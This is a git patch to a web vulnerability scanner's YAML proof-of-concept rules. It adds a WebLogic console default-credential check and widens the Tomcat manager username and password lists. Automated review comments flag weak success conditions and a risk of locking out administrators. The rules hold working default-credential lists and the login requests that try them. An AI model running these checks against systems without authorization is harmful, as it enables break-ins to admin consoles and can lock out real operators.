From 3d3ecac605ba274390b5ab6fda50eaa4d249d0d0 Mon Sep 17 00:00:00 2001
From: canc3s
Date: Mon, 21 Jun 2021 17:22:27 +0800
Subject: [PATCH] add weblogic-console-weak

add weblogic-console-weak
---
 .../pocs/poc-yaml-weblogic-console-weak.yml | 29 +++++++++++++++++++
 ...nager-week.yml => tomcat-manager-weak.yml} | 8 +++--
 2 files changed, 35 insertions(+), 2 deletions(-)
 create mode 100644 WebScan/pocs/poc-yaml-weblogic-console-weak.yml
 rename WebScan/pocs/{tomcat-manager-week.yml => tomcat-manager-weak.yml} (88%)

diff --git a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml b/WebScan/pocs/poc-yaml-weblogic-console-weak.yml
new file mode 100644
index 0000000..99b5151
--- /dev/null
+++ b/WebScan/pocs/poc-yaml-weblogic-console-weak.yml
@@ -0,0 +1,29 @@
+name: poc-yaml-weblogic-console-weak
+sets:
+  username:
+    - weblogic
+  password:
+    - weblogic
+    - weblogic1
+    - welcome1
+    - Oracle@123
+    - weblogic123
+  payload:
+    - UTF-8
+rules:
+  - method: HEAD
+    path: /console/j_security_check
+    follow_redirects: false
+    expression: |
+      response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION")
+  - method: POST
+    path: /console/j_security_check
+    follow_redirects: false
+    headers:
+      Content-type: application/x-www-form-urlencoded
+    body: |
+      j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}}
+    expression: |
+      !response.body.bcontains(b"LoginForm.jsp")
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
\ No newline at end of file
diff --git a/WebScan/pocs/tomcat-manager-week.yml b/WebScan/pocs/tomcat-manager-weak.yml
similarity index 88%
rename from WebScan/pocs/tomcat-manager-week.yml
rename to WebScan/pocs/tomcat-manager-weak.yml
index c11d349..b167851
--- a/WebScan/pocs/tomcat-manager-week.yml
+++ b/WebScan/pocs/tomcat-manager-weak.yml
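Review bot: The success condition of the POST rule, `!response.body.bcontains(b"LoginForm.jsp")`, treats any reply that is not the login form as a valid credential, so a WAF block page, an error page from a host that only passed the HEAD fingerprint, or an empty 302 body all count as a hit. With `follow_redirects: false` a failed WebLogic form login is normally answered with a redirect pointing at `/console/login/LoginForm.jsp`, so the body alone is a weak discriminator; something like `response.status == 302 && !response.headers['Location'].contains("LoginForm.jsp")` would at least require the redirect a real login produces — confirm against a live instance before relying on it. Note also that the `sets` cross-product sends five passwords for the single `weblogic` account, which matches the default WebLogic user-lockout threshold of five consecutive failures, so a scan that misses can lock out the real administrator; a `detail` note about that side effect, or a shorter list, would be worth adding. The `response.headers['Set-Cookie']` lookup in the HEAD rule also assumes the header is present; if the engine errors on a missing key the fingerprint simply fails, which is acceptable but worth a comment.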
@@ -1,12 +1,16 @@
-name: poc-yaml-tomcat-manager-week
+name: poc-yaml-tomcat-manager-weak
 sets:
   username:
     - tomcat
     - admin
+    - root
+    - manager
   password:
-    - tomcat
+    - ""
     - admin
+    - tomcat
     - 123456
+    - root
   payload:
     - base64(username+":"+password)
 rules:
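Review bot: The expanded lists in `sets` make four usernames × five passwords, and five failures per user is exactly the `failureCount` that Tomcat's default `LockOutRealm` in the shipped server.xml uses, so a run with no hit leaves every probed account (including a real `admin`) locked for the default 300 s and any later POC that needs manager access fails silently. Either trim to four passwords per user or document the lockout in `detail` so operators know this weak-credential scan is disruptive. The added empty password `""` is rendered by `base64(username+":"+password)` as `user:`, which is the form Tomcat expects for an empty password, so that part looks right. The `rules` section, where the response is actually checked, begins on the last line of this hunk and continues outside it, so the match expression could not be reviewed here.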